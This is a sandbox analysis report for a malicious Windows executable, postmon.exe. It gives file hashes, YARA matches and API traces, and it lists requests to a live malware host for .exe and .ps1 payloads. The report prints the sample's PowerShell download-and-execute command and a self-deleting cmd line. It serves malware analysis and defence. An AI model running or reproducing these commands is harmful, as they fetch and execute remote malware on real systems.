Summary | ZeroBOX

postmon.exe

Generic Malware Malicious Library Antivirus UPX Malicious Packer PE File OS Processor Check PE32 PowerShell
Category: FILE
Machine: s1_win7_x6403_us
Started: July 28, 2023, 5:22 p.m.
Completed: July 28, 2023, 5:36 p.m.
Size 490.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 8bdd901591eb90456ad781e3c79bb4ad
SHA256 0862c633fcfd3a8e2e1a27e862845e98edc229ab892f3b6dde5184a3217f861f
CRC32 63540208
ssdeep 6144:smeQ8DZA76JirPX2xy1AOC5N6EsVHCJxXyIHIvSw0rKZgs93ACdLYfRkZlWRm:srQii7gG3EsVxsIvHggRYJkom
Yara
  • UPX_Zero - UPX packed file
  • OS_Processor_Check_Zero - OS Processor Check
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • Malicious_Packer_Zero - Malicious Packer
  • IsPE32 - (no description)

DNS (Name / Response / Post-Analysis Lookup)
elturky.net 68.178.227.97 (no post-analysis lookup)

IP Address / Status / Action
164.124.101.2 Active Moloch
38.180.1.27 Active Moloch
68.178.227.97 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleA

buffer: Pinging 127.0.0.1
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: with 32 bytes of data:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Ping statistics for 127.0.0.1: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000138db0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bdef0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bdef0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bdef0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001be190
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001be190
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001be200
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001be200
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001be200
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001be200
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001be430
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001be430
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001be430
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bdf60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bdf60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bdf60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001be2e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001be2e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001be2e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001be2e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001be2e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001be2e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001be2e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001be2e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001be890
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001be890
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001be890
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bdf60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bdf60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001be9e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001be9e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bdf60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bdf60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bdf60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000116af0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000116af0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000116af0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000116af0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b659d50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b659d50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000113330
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000113330
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000113330
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000113330
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section .gfids
resource name AFX_DIALOG_LAYOUT
suspicious_features GET method with no useragent header suspicious_request GET http://elturky.net/ERP/public/js/dd_64.exe
suspicious_features GET method with no useragent header suspicious_request GET http://elturky.net/ERP/public/js/cc2.exe
suspicious_features GET method with no useragent header suspicious_request GET http://elturky.net/ERP/public/js/cc3.exe
suspicious_features GET method with no useragent header suspicious_request GET http://elturky.net/ERP/public/js/cc4.exe
suspicious_features GET method with no useragent header suspicious_request GET http://elturky.net/ERP/public/js/cc5.exe
suspicious_features GET method with no useragent header suspicious_request GET http://elturky.net/ERP/public/js/cc1.php
suspicious_features GET method with no useragent header suspicious_request GET http://elturky.net/ERP/public/js/cc2.php
suspicious_features GET method with no useragent header suspicious_request GET http://elturky.net/ERP/public/js/cc3.php
suspicious_features GET method with no useragent header suspicious_request GET http://elturky.net/ERP/public/js/debug2.ps1
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://38.180.1.27/index.php?id=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&subid=HnTgSX1R
request GET http://elturky.net/ERP/public/js/dd_64.exe
request GET http://elturky.net/ERP/public/js/cc2.exe
request GET http://elturky.net/ERP/public/js/cc3.exe
request GET http://elturky.net/ERP/public/js/cc4.exe
request GET http://elturky.net/ERP/public/js/cc5.exe
request GET http://elturky.net/ERP/public/js/cc1.php
request GET http://elturky.net/ERP/public/js/cc2.php
request GET http://elturky.net/ERP/public/js/cc3.php
request GET http://elturky.net/ERP/public/js/debug2.ps1
request GET http://38.180.1.27/index.php?id=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&subid=HnTgSX1R
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 2424832
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002840000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002a10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef35b1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef382e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef382e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef382f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef382f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef382f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef382f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef382f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef382f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef382f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef382f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3830000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3830000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3830000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3830000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3830000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3831000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3831000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3831000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3831000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef382e000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00022000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00012000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002a12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002a14000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00023000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00024000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00112000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000ed000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00025000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00160000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00013000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00026000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00113000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000d3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0001a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00161000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002a17000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline C:\Windows\System32\cmd.exe /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\postmon.exe" >> NUL
cmdline powershell -command IEX(New-Object Net.Webclient).DownloadString('http://elturky.net/ERP/public/js/debug2.ps1')
cmdline "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('http://elturky.net/ERP/public/js/debug2.ps1')"
cmdline "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\postmon.exe" >> NUL
cmdline C:\Windows\sysnative\cmd.exe /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('http://elturky.net/ERP/public/js/debug2.ps1')"
file C:\Users\test22\AppData\Local\Temp\postmon.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Windows\sysnative\cmd.exe
parameters: /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('http://elturky.net/ERP/public/js/debug2.ps1')"
filepath: C:\Windows\sysnative\cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Windows\system32\cmd.exe
parameters: /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\postmon.exe" >> NUL
filepath: C:\Windows\System32\cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
section .data: size_of_data 0x0003a800, virtual_address 0x00033000, virtual_size 0x0003b520, entropy 7.964945977032195; description: A section with a high entropy has been found
entropy 0.478527607362 description Overall entropy of this PE file is high
Data received
